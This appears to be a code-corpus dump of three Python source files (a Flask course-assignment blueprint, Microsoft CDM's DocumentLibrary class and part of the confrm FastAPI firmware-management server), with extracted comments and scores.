# Query to delete an assignment from the database
con = db.get_db()
cur = con.cursor()
cur.execute("""DELETE FROM assignments WHERE assignment_id = %s
""", (assignment_id,))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id, course_id=course_id))
|
from flask import Flask, render_template, g, redirect, url_for, Blueprint, request, session, abort
from . import db
from portal.auth import login_required, teacher_required
from . import course
bp = Blueprint("assignment", __name__)
def get_assignment(id):
user_id = session.get('user_id')
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.session_id,
sessions.course_id, courses.teacherid
FROM assignments JOIN sessions ON assignments.session_id = sessions.id
JOIN courses ON sessions.course_id = courses.course_id
WHERE assignments.assignment_id = %s
AND courses.teacherid = %s""",
(id, user_id))
check_teacher = cur.fetchone()
cur.close()
if check_teacher is None:
con.close()
abort(400, """You cannot modify this assignment""")
else:
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.name, assignments.description,
assignments.due_date
FROM assignments
WHERE assignment_id = %s""",
(id,))
assignment = cur.fetchone()
cur.close()
return assignment
@bp.route('/course/<int:course_id>/session/<int:id>/create_assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def create_assignment(id, course_id):
"""Single page view to create an assignment."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.course_id, courses.course_id, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id=sessions.course_id
WHERE sessions.id=%s""",
(id,))
course = cur.fetchone()
cur.close()
if request.method == 'POST':
# Getting all information necessary for creating an assignment
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
total_points = request.form['total_points']
con = db.get_db()
cur = con.cursor()
# Query to actually insert assignment into the database
cur.execute("""
INSERT INTO assignments(session_id, name, description, due_date)
VALUES (%s, %s, %s, %s)""",
(id, name, description, due_date))
g.db.commit()
cur.execute("""SELECT assignment_id from assignments
WHERE session_id = %s
AND name =%s
AND description = %s
AND due_date = %s""",
(id, name, description, due_date))
assignment = cur.fetchone()
cur.execute("""SELECT roster.student_id FROM roster WHERE session_id = %s""",
(id,))
students = cur.fetchall()
for student in students:
cur.execute("""INSERT INTO grades (student_id, assignment_id, total_points)
VALUES (%s, %s, %s) """,
(student['student_id'], assignment['assignment_id'], total_points))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=id, course_id=course_id))
con.close()
return render_template('layouts/assignments/create_assignments.html', course=course)
@bp.route('/course/<int:course_id>/session/<int:id>/assignments', methods=('GET',))
@login_required
def view_assignments(id, course_id):
"""Single page view of all the assignments in a session."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.id, sessions.course_id, courses.course_id,
courses.teacherid, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id = sessions.course_id
WHERE sessions.id=%s AND courses.course_id= %s""",
(id, course_id,))
course = cur.fetchone()
# Query to get all of the asssignments in a session
cur.execute("""
SELECT * FROM assignments
WHERE session_id = %s
ORDER BY assignment_id ASC
""", (id,))
assignments = cur.fetchall()
cur.close()
con.close()
return render_template('layouts/assignments/view_assignments.html', course=course, id=id, assignments=assignments)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/edit-assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def edit_assignments(course_id, session_id, id):
"""Singe page view to edit an assignment."""
assignment = get_assignment(id)
if request.method == 'POST':
# getting all info required to update assignment information
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
con = db.get_db()
cur = con.cursor()
# Query to update the information for an assignment
cur.execute("""
UPDATE assignments SET name = %s, description = %s, due_date= %s
WHERE assignment_id = %s
""", (name, description, due_date, id))
# Query to return directly to whichever session the assignment was from
cur.execute("""
SELECT * FROM assignments
WHERE assignment_id = %s""", (id,))
session_id = cur.fetchone()
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id['session_id'], course_id=course_id))
return render_template('layouts/assignments/edit_assignments.html', assignment=assignment)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/delete', methods=['POST'])
@login_required
@teacher_required
def delete_assignments(id, course_id, session_id):
"""Deletes any unwanted assignments."""
assignment = get_assignment(id)
assignment_id = assignment['assignment_id']
# Query to delete an assignment from the database
con = db.get_db()
cur = con.cursor()
cur.execute("""DELETE FROM assignments WHERE assignment_id = %s
""", (assignment_id,))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id, course_id=course_id))
|
en
| 0.665321
|
SELECT assignments.assignment_id, assignments.session_id, sessions.course_id, courses.teacherid FROM assignments JOIN sessions ON assignments.session_id = sessions.id JOIN courses ON sessions.course_id = courses.course_id WHERE assignments.assignment_id = %s AND courses.teacherid = %s You cannot modify this assignment SELECT assignments.assignment_id, assignments.name, assignments.description, assignments.due_date FROM assignments WHERE assignment_id = %s Single page view to create an assignment. SELECT sessions.course_id, courses.course_id, courses.name AS class_name FROM sessions JOIN courses ON sessions.course_id=sessions.course_id WHERE sessions.id=%s # Getting all information necessary for creating an assignment # Query to actually insert assignment into the database INSERT INTO assignments(session_id, name, description, due_date) VALUES (%s, %s, %s, %s) SELECT assignment_id from assignments WHERE session_id = %s AND name =%s AND description = %s AND due_date = %s SELECT roster.student_id FROM roster WHERE session_id = %s INSERT INTO grades (student_id, assignment_id, total_points) VALUES (%s, %s, %s) Single page view of all the assignments in a session. SELECT sessions.id, sessions.course_id, courses.course_id, courses.teacherid, courses.name AS class_name FROM sessions JOIN courses ON sessions.course_id = sessions.course_id WHERE sessions.id=%s AND courses.course_id= %s # Query to get all of the asssignments in a session SELECT * FROM assignments WHERE session_id = %s ORDER BY assignment_id ASC Singe page view to edit an assignment. # getting all info required to update assignment information # Query to update the information for an assignment UPDATE assignments SET name = %s, description = %s, due_date= %s WHERE assignment_id = %s # Query to return directly to whichever session the assignment was from SELECT * FROM assignments WHERE assignment_id = %s Deletes any unwanted assignments. # Query to delete an assignment from the database DELETE FROM assignments WHERE assignment_id = %s
| 2.649792
| 3
|
objectModel/Python/cdm/objectmodel/_document_library.py
|
dhoffland/CDM
| 1
|
6628520
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import threading
from typing import Dict, List, Set, Tuple, Union, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.objectmodel import CdmDocumentDefinition, CdmFolderDefinition
class DocumentLibrary:
"""Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus."""
def __init__(self):
# --- internal ---
self._document_library_lock = threading.Lock()
self._docs_not_loaded = set() # type: Set[str]
self._docs_currently_loading = set() # type: Set[str]
self._docs_not_indexed = set() # type: Set[CdmDocumentDefinition]
self._docs_not_found = set() # type: Set[str]
self._all_documents = [] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
self._path_lookup = {} # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
def _add_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup."""
with self._document_library_lock:
if path not in self._path_lookup:
self._all_documents.append((folder, doc))
self._path_lookup[path] = (folder, doc)
def _remove_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup."""
with self._document_library_lock:
if path in self._path_lookup:
self._path_lookup.pop(path)
self._all_documents.remove((folder, doc))
def _list_docs_not_indexed(self) -> Set['CdmDocumentDefinition']:
"""Returns a list of all the documents that are not indexed."""
docs_not_indexed = [] # type: List[CdmDocumentDefinition]
with self._document_library_lock:
# gets all the documents that needs indexing and set the currentlyIndexing flag to true.
for doc in self._docs_not_indexed:
doc._currently_indexing = True
docs_not_indexed.append(doc)
return docs_not_indexed
def _list_docs_not_loaded(self) -> Set[str]:
"""Returns a list of all the documents that are not loaded."""
with self._document_library_lock:
return self._docs_not_loaded.copy()
def _list_all_documents(self) -> List['CdmDocumentDefinition']:
"""Returns a list of all the documents in the corpus."""
with self._document_library_lock:
return [fd[1] for fd in self._all_documents]
def _add_to_docs_not_loaded(self, path: str):
"""Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if not lookup:
self._docs_not_loaded.add(path)
def _fetch_document_and_mark_for_indexing(self, path: str) -> 'CdmDocumentDefinition':
"""Fetches a document from the path lookup and adds it to the list of documents that are not indexed."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if lookup:
inner_doc = lookup[1] # type: CdmDocumentDefinition
if not inner_doc._imports_indexed and not inner_doc._currently_indexing:
# mark for indexing.
inner_doc._currently_indexing = True
self._docs_not_indexed.add(inner_doc)
return inner_doc
return None
def _need_to_load_document(self, doc_name: str) -> bool:
"""Sets a document's status to loading if the document needs to be loaded."""
with self._document_library_lock:
if doc_name in self._docs_not_loaded and doc_name not in self._docs_not_found and doc_name not in self._docs_currently_loading:
# set status to loading
self._docs_not_loaded.remove(doc_name)
self._docs_currently_loading.add(doc_name)
return True
return False
def _mark_document_as_loaded_or_failed(self, doc: 'CdmDocumentDefinition', doc_name: str, docs_now_loaded: Set['CdmDocumentDefinition']) -> bool:
"""Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load."""
with self._document_library_lock:
# doc is no longer loading
self._docs_currently_loading.remove(doc_name)
if doc:
# doc is now loaded
docs_now_loaded.add(doc)
# the doc needs to be indexed
self._docs_not_indexed.add(doc)
doc._currently_indexing = True
return True
else:
# the doc failed to load, so set doc as not found
self._docs_not_found.add(doc_name)
return False
def _mark_document_as_indexed(self, doc: 'CdmDocumentDefinition'):
"""Removes a document from the list of documents that are not indexed to mark it as indexed."""
with self._document_library_lock:
self._docs_not_indexed.discard(doc)
def _mark_document_for_indexing(self, doc: 'CdmDocumentDefinition'):
"""Adds a document to the list of documents that are not indexed to mark it for indexing."""
with self._document_library_lock:
self._docs_not_indexed.add(doc)
def _contains(self, fd: Tuple['CdmFolderDefinition', 'CdmDocumentDefinition']) -> bool:
"""Whether a specific pair of folder-document exists in the list of all documents in the corpus."""
return fd in self._all_documents
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import threading
from typing import Dict, List, Set, Tuple, Union, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.objectmodel import CdmDocumentDefinition, CdmFolderDefinition
class DocumentLibrary:
"""Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus."""
def __init__(self):
# --- internal ---
self._document_library_lock = threading.Lock()
self._docs_not_loaded = set() # type: Set[str]
self._docs_currently_loading = set() # type: Set[str]
self._docs_not_indexed = set() # type: Set[CdmDocumentDefinition]
self._docs_not_found = set() # type: Set[str]
self._all_documents = [] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
self._path_lookup = {} # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
def _add_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup."""
with self._document_library_lock:
if path not in self._path_lookup:
self._all_documents.append((folder, doc))
self._path_lookup[path] = (folder, doc)
def _remove_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup."""
with self._document_library_lock:
if path in self._path_lookup:
self._path_lookup.pop(path)
self._all_documents.remove((folder, doc))
def _list_docs_not_indexed(self) -> Set['CdmDocumentDefinition']:
"""Returns a list of all the documents that are not indexed."""
docs_not_indexed = [] # type: List[CdmDocumentDefinition]
with self._document_library_lock:
# gets all the documents that needs indexing and set the currentlyIndexing flag to true.
for doc in self._docs_not_indexed:
doc._currently_indexing = True
docs_not_indexed.append(doc)
return docs_not_indexed
def _list_docs_not_loaded(self) -> Set[str]:
"""Returns a list of all the documents that are not loaded."""
with self._document_library_lock:
return self._docs_not_loaded.copy()
def _list_all_documents(self) -> List['CdmDocumentDefinition']:
"""Returns a list of all the documents in the corpus."""
with self._document_library_lock:
return [fd[1] for fd in self._all_documents]
def _add_to_docs_not_loaded(self, path: str):
"""Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if not lookup:
self._docs_not_loaded.add(path)
def _fetch_document_and_mark_for_indexing(self, path: str) -> 'CdmDocumentDefinition':
"""Fetches a document from the path lookup and adds it to the list of documents that are not indexed."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if lookup:
inner_doc = lookup[1] # type: CdmDocumentDefinition
if not inner_doc._imports_indexed and not inner_doc._currently_indexing:
# mark for indexing.
inner_doc._currently_indexing = True
self._docs_not_indexed.add(inner_doc)
return inner_doc
return None
def _need_to_load_document(self, doc_name: str) -> bool:
"""Sets a document's status to loading if the document needs to be loaded."""
with self._document_library_lock:
if doc_name in self._docs_not_loaded and doc_name not in self._docs_not_found and doc_name not in self._docs_currently_loading:
# set status to loading
self._docs_not_loaded.remove(doc_name)
self._docs_currently_loading.add(doc_name)
return True
return False
def _mark_document_as_loaded_or_failed(self, doc: 'CdmDocumentDefinition', doc_name: str, docs_now_loaded: Set['CdmDocumentDefinition']) -> bool:
"""Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load."""
with self._document_library_lock:
# doc is no longer loading
self._docs_currently_loading.remove(doc_name)
if doc:
# doc is now loaded
docs_now_loaded.add(doc)
# the doc needs to be indexed
self._docs_not_indexed.add(doc)
doc._currently_indexing = True
return True
else:
# the doc failed to load, so set doc as not found
self._docs_not_found.add(doc_name)
return False
def _mark_document_as_indexed(self, doc: 'CdmDocumentDefinition'):
"""Removes a document from the list of documents that are not indexed to mark it as indexed."""
with self._document_library_lock:
self._docs_not_indexed.discard(doc)
def _mark_document_for_indexing(self, doc: 'CdmDocumentDefinition'):
"""Adds a document to the list of documents that are not indexed to mark it for indexing."""
with self._document_library_lock:
self._docs_not_indexed.add(doc)
def _contains(self, fd: Tuple['CdmFolderDefinition', 'CdmDocumentDefinition']) -> bool:
"""Whether a specific pair of folder-document exists in the list of all documents in the corpus."""
return fd in self._all_documents
|
en
| 0.788465
|
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus. # --- internal --- # type: Set[str] # type: Set[str] # type: Set[CdmDocumentDefinition] # type: Set[str] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]] # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]] Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup. Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup. Returns a list of all the documents that are not indexed. # type: List[CdmDocumentDefinition] # gets all the documents that needs indexing and set the currentlyIndexing flag to true. Returns a list of all the documents that are not loaded. Returns a list of all the documents in the corpus. Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup. # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition] Fetches a document from the path lookup and adds it to the list of documents that are not indexed. # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition] # type: CdmDocumentDefinition # mark for indexing. Sets a document's status to loading if the document needs to be loaded. # set status to loading Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load. # doc is no longer loading # doc is now loaded # the doc needs to be indexed # the doc failed to load, so set doc as not found Removes a document from the list of documents that are not indexed to mark it as indexed. Adds a document to the list of documents that are not indexed to mark it for indexing. Whether a specific pair of folder-document exists in the list of all documents in the corpus.
| 2.341348
| 2
|
confrm/confrm.py
|
confrm/confrm
| 1
|
6628521
|
<filename>confrm/confrm.py
"""Main FastAPI Implementation of confrm
Copyright 2020 confrm.io
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Codes:
000 ERROR - - Package not found
001 ERROR - - Node not found
002 ERROR - - Package version not found
003 ERROR PUT /package/ Package already exists
004 ERROR PUT /package/ Package name cannot be empty
005 ERROR PUT /register_node/ Node id is invalid
006 ERROR PUT /package_version/ Version already exists for package
007 ERROR DELETE /node_package/ Node does not have a force package entry
008 ERROR PUT /node_package/ Package has no active version
009
010 ERROR PUT /package/ Package name does not match pattern
011 ERROR GET /check_for_update/ No versions found for package
012 ERROR GET /config/ Key not found
013
014
015
016 ERROR PUT /config/ Key name does not match pattern
017 ERROR POST /package_version/ Version numbers cannot be negative
018 ERROR PUT /node_package/ Package version not found
019
020 ERROR DELETE /package_version/ Package version not found
021 WARNING DELETE /package_version/ Active version not set
022 ERROR PUT /node_title/ Node does not exist
023 ERROR PUT /node_title/ Node title is too long
024 ERROR DELETE /config/ Key not found
025
026 ERROR POST /package_version/ Canary node not found
027
028
029
"""
import base64
import datetime
import logging
import os
import re
import time
import uuid
from copy import deepcopy
import toml
from Crypto.Hash import SHA256
from fastapi import FastAPI, File, Depends, Response, Request, status
from fastapi.responses import FileResponse
from fastapi.staticfiles import StaticFiles
from tinydb import TinyDB, Query
from tinydb.operations import delete
from markupsafe import escape
from pydantic import BaseModel # pylint: disable=E0611
from confrm.responses import ConfrmFileResponse
from confrm.zeroconf import ConfrmZeroconf
logger = logging.getLogger('confrm')
logger.setLevel(logging.INFO)
# pydantic data models are used to describe the inputs for the various REST
# API calls, if the calls do not match these names and data-types then the call
# to FastAPI will fail
class Package(BaseModel): # pylint: disable=R0903
"""Definition of a package"""
name: str
title: str
description: str
platform: str
class PackageVersion(BaseModel): # pylint: disable=R0903
"""Definition of a package version"""
name: str
major: int
minor: int
revision: int
APP = FastAPI()
CONFIG = None
DB = None
ZEROCONF = ConfrmZeroconf()
def do_config():
"""Gets the config based on an environment variable and sets up global
objects as required """
global CONFIG, DB # pylint: disable=W0603
if "CONFRM_CONFIG" not in os.environ.keys():
msg = "CONFRM_CONFIG not set in os.environ"
logging.error(msg)
raise ValueError(msg)
config_file = os.environ["CONFRM_CONFIG"]
if os.path.isfile(config_file) is False:
msg = f"Config file {config_file} does not exist"
logging.error(msg)
raise ValueError(msg)
CONFIG = toml.load(config_file)
# Create the database from the data store
DB = TinyDB(os.path.join(CONFIG["storage"]["data_dir"], "confrm_db.json"))
# Check a blob folder exists
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
if not os.path.isdir(blob_dir):
os.mkdir(blob_dir)
def get_package_versions(name: str, package: {} = None):
"""Handles the version ordering logic
Versions are sorted to be in descending order, with the currently
active version at the top of the list (position 0)
Attributes:
name (str): package name string
package ({}): [Optional] package dict, saves looking up the entry again
"""
query = Query()
if package is None:
package = DB.table("packages").search(query.name == name)
package_versions = DB.table("package_versions")
versions_raw = package_versions.search(query.name == name)
versions = []
current_version = None
for entry in versions_raw:
date_str = ""
if entry["date"] <= 0:
date_str = "Unknown"
else:
date_str = datetime.datetime.fromtimestamp(entry["date"])
version_str = f'{entry["major"]}.{entry["minor"]}.{entry["revision"]}'
if "current_version" in package.keys() and \
version_str == package["current_version"]:
current_version = {
"number": version_str,
"date": date_str,
"blob": entry["blob_id"]
}
else:
versions.append({
"number": version_str,
"date": date_str,
"blob": entry["blob_id"]
})
versions = sorted(
versions,
key=lambda x: [int(i) if i.isdigit()
else i for i in x["number"].split('.')],
reverse=True
)
if current_version is not None:
versions.insert(0, current_version)
return versions
def format_package_info(package: dict, lite: bool = False):
"""Formats data in to correct dict form
Can generate long form (for UI) or short form / lite (for nodes)
Attributes:
package (dict): package dict from DB
lite (bool): if true a reduced response is generated
"""
current_version = ""
if "current_version" in package.keys():
current_version = package["current_version"]
# Minimal data for lite implementation
if lite:
return {
"current_version": current_version,
}
versions = get_package_versions(package["name"], package)
latest_version = current_version
if len(versions) > 0:
latest_version = max(versions, key=lambda x: x["date"])["number"]
return {
"name": package["name"],
"title": package["title"],
"description": package["description"],
"platform": package["platform"],
"current_version": current_version,
"latest_version": latest_version,
"versions": versions
}
def get_package_version_by_version_string(package_name: str, version: str):
"""Get package version using string name and string version number"""
package_versions = DB.table("package_versions")
query = Query()
parts = version.split(".")
return package_versions.get(
(query.name == package_name) &
(query.major == int(parts[0])) &
(query.minor == int(parts[1])) &
(query.revision == int(parts[2])))
def sort_configs(configs): # pylint: disable=R0912
"""Sort configs by global/package/node, then by package name, then by node name
Attributes:
configs (list): List of config dicts
"""
result = []
# Find all unique keys and sort alphabetically
_keys = []
for config in configs:
if config["key"] not in _keys:
_keys.append(config["key"])
_keys = sorted(_keys, key=str.lower)
# For each key find globals, then packages, then nodes
for key in _keys:
_packages = []
_nodes = []
for config in configs:
if config["key"] == key:
if config["type"] == "global":
result.append(config)
elif config["type"] == "package":
_packages.append(config)
elif config["type"] == "node":
_nodes.append(config)
# Sort the package end node elements alphabetically
_package_ids = sorted([_package["id"]
for _package in _packages], key=str.lower)
for package in _package_ids:
for config in configs:
if config["key"] == key and config["type"] == "package" and config["id"] == package:
result.append(config)
break
_node_ids = sorted([_node["id"] for _node in _nodes], key=str.lower)
for node in _node_ids:
for config in configs:
if config["key"] == key and config["type"] == "node" and config["id"] == node:
result.append(config)
break
return result
def set_canary(node_id: str, package: str, version: str):
"""Creates an entry in the canary table for this node.
If the node already exists then the previous entry will be deleted, and if an entry
for the package already exists then that will be deleted.
There can only be one entry per package and per node.
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
version (str): Version of package the node will be set to
"""
query = Query()
canaries = DB.table("canary")
# Check for existing node entry and delete if it exists
canary_list = canaries.search(query.node_id == node_id)
for canary in canary_list:
canaries.remote(doc_ids=[canary.doc_id])
# Check for existing entries for the given package, delete if exists
packages_list = canaries.search(query.package == package)
for package_doc in packages_list:
canaries.remove(doc_ids=[package_doc.doc_id])
# Insert new entry, force is set to True, once the node has been updated
canaries.insert({
"package": package,
"version": version,
"node_id": node_id,
"force": True
})
def remove_canary(package: str = "", node_id: str = ""):
"""Removes the given package or node canary entry
Exceptions:
ValueError("Canary Not Found")
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
"""
if not package and not node_id:
raise ValueError("Canary Not Found")
query = Query()
canaries = DB.table("canary")
remove_count = 0
if package:
package_canaries = canaries.search(query.package == package)
remove_count += len(package_canaries)
for package_doc in package_canaries:
canaries.remove(doc_ids=[package_doc.doc_id])
if node_id:
node_canaries = canaries.search(query.node_id == node_id)
remove_count += len(node_canaries)
for node_doc in node_canaries:
canaries.remove(doc_ids=[node_doc.doc_id])
if remove_count == 0:
raise ValueError("Canary Not Found")
def get_canary(package: str = "", node_id: str = ""):
"""Checks if a canary exists for given package or node_id
Exceptions:
ValueError("Input Not Set")
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
Returns:
None: No entry found
TinyDB Document: Found entry
"""
if not package and not node_id:
raise ValueError("Input Not Set")
query = Query()
canaries = DB.table("canary")
if package:
package_doc = canaries.get(query.package == package)
if package_doc is not None:
return package_doc
if node_id:
node_doc = canaries.get(query.node_id == node_id)
if node_doc is not None:
return node_doc
return None
def package_exists(package: str):
""" Checks if package exists, returns tuple of (package_doc, status, error_dict)
Attributes:
packages (str): Package to search for
"""
query = Query()
packages = DB.table("packages")
package_doc = packages.get(query.name == package)
if package_doc is None:
msg = "Package not found"
return (None, status.HTTP_404_NOT_FOUND, {
"error": "confrm-000",
"message": msg,
"detail": "The package specified was not found"
})
return (package_doc, None, None)
def node_exists(node_id: str):
""" Checks if node exists, returns tuple of (node_doc, status, error_dict)
Attributes:
packages (str): Package to search for
"""
query = Query()
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
msg = "Node not found"
return (None, status.HTTP_404_NOT_FOUND, {
"error": "confrm-001",
"message": msg,
"detail": "The node specified was not found"
})
return (node_doc, None, None)
# Files server in /static will point to ./dashboard (with respect to the running
# script)
APP.mount("/static",
StaticFiles(directory=os.path.join(os.path.dirname(__file__), "dashboard")
),
name="home")
@APP.on_event("startup")
async def startup_event():
"""Is called on application startup"""
do_config()
@APP.on_event("shutdown")
async def shutdown_event():
"""Is called on application shutdown"""
ZEROCONF.close()
@APP.get("/")
async def index():
"""Returns index page for UI"""
return FileResponse(
os.path.join(os.path.dirname(__file__), "dashboard/index.html")
)
@APP.get("/info/")
async def info():
"""Get basic info for UI elements"""
ret = {}
packages = DB.table("packages")
ret["packages"] = len(packages)
nodes = DB.table("nodes")
ret["nodes"] = len(nodes)
return ret
@APP.get("/time/")
async def get_time():
"""Returns time of day from server as unix epoch time"""
if CONFIG is None:
do_config()
return {"time": round(time.time())}
@APP.get("/canary/", status_code=status.HTTP_200_OK)
async def get_canary_api(response: Response, node_id: str = ""):
"""Helper to read back the canary status for a node
Attributes:
node_id (str): The node id to check against
response (Response): Starlette response object for setting return codes
"""
canary = get_canary(node_id=node_id)
if canary is None:
msg = "Canary entry not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-022",
"message": msg,
"detail": msg
}
return canary
@APP.put("/register_node/", status_code=status.HTTP_200_OK)
async def register_node( # pylint: disable=R0913
node_id: str,
package: str,
version: str,
description: str,
platform: str,
request: Request,
response: Response):
"""Registers a node to the server
Attributes:
node_id (str): The node id, must be unique, MAC addresses work well
package (str): Package installed on the node
version (str): Version string of currently running package
description (str): Description of package
platform: (str): Platform type (i.e. esp32)
request (Request): Starlette request object for getting client information
response (Response): Starlette response object for setting return codes
Returns:
HTTP_200_OK
HTTP_404_NOT_FOUND
"""
query = Query()
nodes = DB.table("nodes")
# Make sure input is sane
node_id = escape(node_id)
package = escape(package)
version = escape(version)
description = escape(description)
platform = escape(platform)
# Asterisk is not allowed!
if node_id == "*":
msg = "Node id is invalid"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-005",
"message": msg,
"detail": "A node attempted to register with an invalid node_id"
}
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
entry = {
"node_id": node_id,
"title": node_id,
"package": package,
"version": version,
"description": description,
"platform": platform,
"last_updated": -1,
"last_seen": round(time.time()),
"ip_address": request.client.host
}
nodes.insert(entry)
return {}
# Update the package entry based on package name change, new version of a package
# and register this as the last update time
if node_doc["package"] != package: # Package changed
node_doc["package"] = package
node_doc["version"] = version
node_doc["last_updated"] = -1
elif node_doc["version"] != version: # Version of package changed
node_doc["version"] = version
node_doc["last_updated"] = round(time.time())
node_doc["last_seen"] = round(time.time())
node_doc["package"] = package
node_doc["description"] = description
node_doc["platform"] = platform
node_doc["ip_address"] = request.client.host
nodes.update(node_doc, query.node_id == node_id)
# Check if force package change
if "force" in node_doc.keys() and node_doc["package"] == node_doc["force"]["package"]:
nodes.update(delete("force"), query.node_id == node_id)
# Check to see if a canary
canary = get_canary(node_id=node_id)
if canary is not None:
canaries = DB.table("canary")
canary["force"] = False
canaries.update(canary, query.node_id == node_id)
return {}
@APP.get("/nodes/", status_code=status.HTTP_200_OK)
async def get_nodes(package: str = "", node_id: str = ""):
"""Returns a list of nodes, if package is set the only return nodes using that package, if
a node is set then return the doc for that node.
Attributes:
package (str): name of package to return node list for
"""
query = Query()
nodes = DB.table("nodes")
node_list = []
if package and node_id:
node_list = nodes.search((query.package == package) &
(query.node_id == node_id))
elif package:
node_list = nodes.search(query.package == package)
elif node_id:
node_list = nodes.search(query.node_id == node_id)
else:
node_list = nodes.all()
if len(node_list) == 0:
return {}
# Make a new copy of list so we can make changes to elements for display layer without
# changing the values in the database
new_node_list = deepcopy(node_list)
node_list = new_node_list
for node in node_list:
if node["last_updated"] != -1:
value = datetime.datetime.fromtimestamp(node["last_updated"])
node["last_updated"] = f"{value:%Y-%m-%d %H:%M:%S}"
else:
node["last_updated"] = "Unknown"
if node["last_seen"] != -1:
value = datetime.datetime.fromtimestamp(node["last_seen"])
node["last_seen"] = f"{value:%Y-%m-%d %H:%M:%S}"
else:
node["last_seen"] = "Unknown"
if not package and node_id:
return node_list[0]
return node_list
@APP.put("/node_title/", status_code=status.HTTP_200_OK)
async def put_node_title(response: Response, node_id: str = "", title: str = ""):
"""Sets the title of a node
Attributes:
package (str): name of package to return node list for
"""
query = Query()
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
msg = "Node does not exist"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-022",
"message": msg,
"detail": "While attempting to set the title of a node, the node id given was not"
" found"
}
title = escape(title)
if len(title) > 80:
msg = "Node title is too long"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-023",
"message": msg,
"detail": "While attempting to set the title of a node, the title was too long"
}
nodes.update({"title": title}, query.node_id == node_id)
return {}
@APP.get("/packages/")
async def package_list():
"""Get package list and process for displaying on the UI """
if CONFIG is None:
do_config()
packages = DB.table("packages")
# Packages contains a RAW list of packages, should process them down for
# the UI - unique 'name' fields, with multiple 'versions'
ui_packages = {}
for package in packages:
ui_packages[package["name"]] = format_package_info(package)
return ui_packages
